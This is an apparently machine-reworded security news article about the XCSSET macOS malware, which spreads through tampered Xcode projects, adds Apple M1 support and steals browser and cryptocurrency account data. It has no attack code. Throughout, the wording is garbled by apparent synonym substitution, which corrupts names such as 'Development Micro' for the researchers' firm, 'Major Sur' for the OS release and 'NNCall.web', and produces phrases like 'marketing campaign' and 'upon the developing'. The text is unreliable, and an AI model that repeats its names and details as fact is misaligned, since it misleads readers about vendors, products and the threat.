A Mac malware marketing campaign focusing on Xcode developers has been retooled to add guidance for Apple’s new M1 chips and expand its capabilities to steal confidential information from cryptocurrency applications.
XCSSET came into the spotlight in August 2020 just after it was observed to spread by way of modified Xcode IDE tasks, which, upon the developing, ended up configured to execute the payload. The malware repackages payload modules to imitate respectable Mac applications, which are eventually liable for infecting community Xcode initiatives and injecting the key payload to execute when the compromised undertaking builds.
Then in March 2021, Kaspersky scientists uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are actively adapting their executables and porting them to operate on new Apple Silicon Macs natively.
“It hosts Safari update deals in the [command-and-control] server, then downloads and installs deals for the user’s OS version,” Development Micro scientists reported in an evaluation released on Friday. “To adapt to the newly-released Major Sur, new packages for ‘Safari 14’ were being extra.”
In addition to trojanizing Safari to exfiltrate facts, the malware is also regarded for exploiting the remote debugging method in other browsers these types of as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex Browser to have out UXSS attacks.
What’s a lot more, the malware now even attempts to steal account information and facts from many sites, like cryptocurrency buying and selling platforms Huobi, Binance, NNCall.web, Envato, and 163.com, with abilities to replace the address in a user’s cryptocurrency wallet with those people less than the attacker’s command.
XCSSET’s mode of distribution through doctored Xcode tasks poses a severe threat, as influenced developers who unwittingly share their get the job done on GitHub could pass on the malware to their people in the variety of the compromised Xcode initiatives, primary to “a supply-chain-like assault for users who rely on these repositories as dependencies in their own tasks.”